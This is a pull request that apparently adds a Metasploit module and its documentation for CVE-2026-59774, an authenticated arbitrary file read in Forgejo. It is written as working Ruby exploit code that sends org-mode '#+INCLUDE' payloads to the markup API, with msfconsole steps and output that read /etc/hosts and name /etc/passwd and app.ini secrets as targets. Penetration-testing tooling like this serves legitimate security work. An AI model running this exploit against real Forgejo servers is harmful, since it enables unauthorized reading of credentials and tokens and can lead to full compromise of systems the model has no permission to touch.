### PR TITLE
Add Forgejo arbitrary file read module (CVE-2026-59774)

### DIFF
--- a/documentation/modules/auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774.md
+++ b/documentation/modules/auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774.md
@@ -1,0 +1,96 @@
+## Introduction
+
+This module authenticates to the Forgejo markup rendering API and abuses org-mode `#+INCLUDE` directives to read arbitrary files from the server filesystem.
+
+## Vulnerable Application
+
+Forgejo versions 7.0 through 15.0.5 and 16.0.0 through 16.0.1 are vulnerable to
+an arbitrary file read via the markup rendering API endpoint. The `go-org`
+library's default `ReadFile` callback (`ioutil.ReadFile`) is not overridden,
+allowing the `#+INCLUDE` directive to read arbitrary files accessible to the
+service user.
+
+Valid credentials are required to access the API markup endpoint.
+
+### Setup
+
+A vulnerable Forgejo instance can be started with Docker:
+
+```
+docker run -d -p 3000:3000 codeberg.org/forgejo/forgejo:15.0.5
+```
+
+Or simply download a vulnerable binary [here](https://code.forgejo.org/forgejo/forgejo/releases/tag/v15.0.5).
+
+After setup, create an admin account and at least one repository (public or
+private). The module requires valid credentials and a repository context.
+
+## Verification Steps
+
+1. Install a vulnerable Forgejo instance (7.0 through 15.0.5 or 16.0.0-16.0.1)
+2. Create a user account and at least one repository
+3. Start msfconsole
+4. Do: `use auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774`
+5. Do: `set RHOSTS <target>`
+6. Do: `set USERNAME <user>`
+7. Do: `set PASSWORD <pass>`
+8. Do: `run`
+9. You should see the contents of `/etc/passwd`
+
+## Options
+
+### FILEPATH
+
+The absolute path of the file to read on the target server. Default: `/etc/passwd`.
+
+### REPO
+
+The repository path in `owner/repo` format. If left blank, the module will
+auto-detect a repository via the API using the provided credentials.
+
+### USERNAME
+
+Username for authentication. Required.
+
+### PASSWORD
+
+Password for authentication. Required.
+
+### STORE_LOOT
+
+When set to `true`, stores the retrieved file contents as loot. Default: `true`.
+
+## Scenarios
+
+### Forgejo 15.0.5 on Linux
+
+```
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > use auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set USERNAME jvoisin
+USERNAME => jvoisin
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set PASSWORD Testpass123!
+PASSWORD => Testpass123!
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set FILEPATH /etc/hosts
+FILEPATH => /etc/hosts
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > check 
+[+] 127.0.0.1:3000 - The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable (patched in 15.0.6 / 16.0.2)
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable (patched in 15.0.6 / 16.0.2)
+[*] No REPO specified, searching for a public repository...
+[*] Found public repository: jvoisin/public-test
+[*] Reading /etc/hosts via markup rendering
+[+] Successfully read /etc/hosts (385 bytes)
+# Loopback entries; do not change.
+# For historical reasons, localhost precedes localhost.localdomain:
+127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
+::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
+# See hosts(5) for proper format and other examples:
+# 192.168.1.10 foo.example.org foo
+# 192.168.1.13 bar.example.org bar
+#
+[+] File saved to: /home/jvoisin/.msf4/loot/20260812103054_default_127.0.0.1_forgejo.file_233718.txt
+[*] Auxiliary module execution completed
+msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) >
+```

--- a/modules/auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774.rb
+++ b/modules/auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774.rb
@@ -1,0 +1,224 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Forgejo Arbitrary File Read via Org-mode Include',
+        'Description' => %q{
+          Forgejo versions 7.0 through 15.0.5 and 16.0.0 through 16.0.1 are
+          vulnerable to an arbitrary file read via the markup rendering API
+          endpoint. The go-org library's default ReadFile callback
+          (ioutil.ReadFile) is not overridden, allowing the #+INCLUDE directive
+          to read arbitrary files accessible to the service user.
+
+          Valid credentials are required to access the API markup endpoint.
+          Extracting sensitive files such as app.ini can expose INTERNAL_TOKEN
+          and other secrets, potentially leading to remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xbow-security', # Discovery (Gitea advisory)
+          'NightRang3r',   # Independent discovery
+        ],
+        'References' => [
+          ['CVE', '2026-59774'],
+          ['GHSA', '6v53-hr58-556r'],
+          ['URL', 'https://codeberg.org/forgejo/forgejo/pulls/13682'],
+        ],
+        'DisclosureDate' => '2026-07-30',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [true, 'Base path to the Forgejo application', '/']),
+        OptString.new('REPO', [false, 'Public repository path (owner/repo). Auto-detected if blank', '']),
+        OptString.new('FILEPATH', [true, 'Absolute path of the file to read', '/etc/passwd']),
+        OptString.new('USERNAME', [true, 'Username for authentication', '']),
+        OptString.new('PASSWORD', [true, 'Password for authentication', '']),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', true]),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'version')
+    )
+
+    return Exploit::CheckCode::Unknown('Failed to connect to the target') unless res
+    return Exploit::CheckCode::Unknown('Unexpected HTTP response') unless res.code == 200
+
+    version_info = res.get_json_document
+    return Exploit::CheckCode::Unknown('Could not parse version response') if version_info.empty?
+
+    version_str = version_info['version'].to_s
+    return Exploit::CheckCode::Unknown('No version field in response') if version_str.empty?
+
+    unless version_str.include?('+gitea-')
+      return Exploit::CheckCode::Safe('Target does not appear to be Forgejo')
+    end
+
+    report_service(host: rhost, port: rport, proto: 'tcp', name: 'http', info: "Forgejo #{version_str}")
+
+    version_check = check_forgejo_version(version_str)
+    return version_check unless version_check == Exploit::CheckCode::Appears
+
+    # Verify credentials work before reporting vulnerable
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'user'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+    )
+    unless res&.code == 200
+      return Exploit::CheckCode::Detected('Version is vulnerable but credentials are invalid')
+    end
+
+    version_check
+  end
+
+  def check_forgejo_version(version_str)
+    forgejo_version = version_str.split('+').first
+
+    begin
+      ver = Rex::Version.new(forgejo_version)
+    rescue ArgumentError
+      return Exploit::CheckCode::Unknown("Could not parse Forgejo version: #{forgejo_version}")
+    end
+
+    if ver < Rex::Version.new('7.0.0')
+      return Exploit::CheckCode::Safe("Forgejo #{forgejo_version} predates org-mode rendering support")
+    end
+
+    # Patched in v15.0.6 (15.x branch) and v16.0.2 (16.x branch)
+    if (ver >= Rex::Version.new('15.0.6') && ver < Rex::Version.new('16.0.0')) ||
+       ver >= Rex::Version.new('16.0.2')
+      return Exploit::CheckCode::Safe("Forgejo #{forgejo_version} is patched")
+    end
+
+    Exploit::CheckCode::Appears("Forgejo #{forgejo_version} is vulnerable (patched in 15.0.6 / 16.0.2)")
+  end
+
+  def find_public_repo
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'repos', 'search'),
+      'vars_get' => { 'limit' => 1 }
+    }
+    opts['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+
+    res = send_request_cgi(opts)
+    return nil unless res&.code == 200
+
+    repos = res.get_json_document
+    data = repos.is_a?(Hash) ? repos['data'] : repos
+    return nil unless data.is_a?(Array) && !data.empty? && data[0].include?('full_name')
+
+    full_name = data[0]['full_name'].to_s
+    return nil unless full_name.match?(%r{\A[\w.-]+/[\w.-]+\z})
+
+    full_name
+  end
+
+  def read_file_via_api(repo_path, file_path)
+    fail_with(Failure::BadConfig, 'FILEPATH must not contain double-quote characters') if file_path.include?('"')
+
+    payload_text = "#+INCLUDE: \"#{file_path}\" src text"
+
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'markup'),
+      'ctype' => 'application/json',
+      'data' => {
+        'Mode' => 'file',
+        'Text' => payload_text,
+        'FilePath' => 'include.org',
+        'Context' => repo_path
+      }.to_json
+    }
+    opts['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+
+    res = send_request_cgi(opts)
+    return nil unless res
+
+    fail_with(Failure::NoAccess, 'Authentication failed') if res.code == 401
+
+    return nil unless res.code == 200
+
+    extract_content(res)
+  end
+
+  def extract_content(res)
+    doc = res.get_html_document
+    return nil unless doc
+
+    # "src text" mode wraps content in <pre><code>...</code></pre>
+    code_el = doc.at_css('pre > code')
+    return nil unless code_el
+
+    content = code_el.text
+    content.blank? ? nil : content
+  end
+
+  def run
+    repo_path = datastore['REPO']
+
+    if repo_path.blank?
+      print_status('No REPO specified, searching for a public repository...')
+      repo_path = find_public_repo
+      fail_with(Failure::NotFound, 'No public repository found. Set REPO to a known public owner/repo path.') unless repo_path
+      print_status("Found public repository: #{repo_path}")
+    else
+      fail_with(Failure::BadConfig, 'REPO must be in owner/repo format') unless repo_path.match?(%r{\A[\w.-]+/[\w.-]+\z})
+    end
+
+    file_path = datastore['FILEPATH']
+    print_status("Reading #{file_path} via markup rendering")
+
+    content = read_file_via_api(repo_path, file_path)
+
+    if content.nil? || content.strip.empty?
+      print_error('File is empty or could not be read. The file may not exist or may not be accessible to the service user.')
+      return
+    end
+
+    print_good("Successfully read #{file_path} (#{content.bytesize} bytes)")
+    print_line(content)
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references,
+      info: "Arbitrary file read confirmed: #{file_path}"
+    )
+
+    if datastore['STORE_LOOT']
+      loot_path = store_loot(
+        'forgejo.file',
+        'text/plain',
+        rhost,
+        content,
+        file_path,
+        'File read via CVE-2026-59774'
+      )
+      print_good("File saved to: #{loot_path}")
+    end
+  end
+end


### PR DESCRIPTION
<!-- PRs missing a description, verification steps, or test evidence will be closed. Each PR should address a single module, bug fix, or cohesive logical change. For full guidance, see CONTRIBUTING.md and the module acceptance guidelines linked below. If your PR is not yet complete, mark it as a draft. -->

## Description
Forgejo 7.0 through 15.0.5 and 16.0.0–16.0.1 expose an arbitrary file read via the markup rendering API. The go-org library's default ReadFile callback is not overridden, so #+INCLUDE directives resolve absolute paths on the server filesystem.

The module authenticates to POST /api/v1/markup with org-mode content and extracts the included file from the rendered HTML response.


## Breaking Changes

None

## Reviewer Notes

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. Install a vulnerable Forgejo instance (7.0 through 15.0.5 or 16.0.0-16.0.1) by downloading a binary from https://code.forgejo.org/forgejo/forgejo/releases/tag/v15.0.5)
2. Install Forgejo
3. Create a user account and at least one repository
4. Start msfconsole
5. Do: `use auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774`
6. Do: `set RHOSTS <target>`
7. Do: `set USERNAME <user>`
8. Do: `set PASSWORD <pass>`
9. Do: `run`
10. You should see the contents of `/etc/passwd`

## Test Evidence

```
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > use auxiliary/gather/forgejo_orgmode_fileread_cve_2026_59774
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set USERNAME jvoisin
USERNAME => jvoisin
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set PASSWORD Testpass123!
PASSWORD => Testpass123!
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > 
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > check 
[+] 127.0.0.1:3000 - The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable (patched in 15.0.6 / 16.0.2)
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > set FILEPATH /etc/hosts
FILEPATH => /etc/hosts
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Forgejo 15.0.5 is vulnerable (patched in 15.0.6 / 16.0.2)
[*] No REPO specified, searching for a public repository...
[*] Found public repository: jvoisin/public-test
[*] Reading /etc/hosts via markup rendering
[+] Successfully read /etc/hosts (385 bytes)
# Loopback entries; do not change.
# For historical reasons, localhost precedes localhost.localdomain:
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
# See hosts(5) for proper format and other examples:
# 192.168.1.10 foo.example.org foo
# 192.168.1.13 bar.example.org bar
#
[+] File saved to: /home/jvoisin/.msf4/loot/20260812103054_default_127.0.0.1_forgejo.file_233718.txt
[*] Auxiliary module execution completed
msf auxiliary(gather/forgejo_orgmode_fileread_cve_2026_59774) > 
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora <!-- e.g., Ubuntu 22.04, Windows 11, macOS 14.2 --> |
| **Target Software/Hardware** | Forgejo 15.0.5 <!-- Name and version of the software or hardware targeted by this change --> |


## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

None


## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
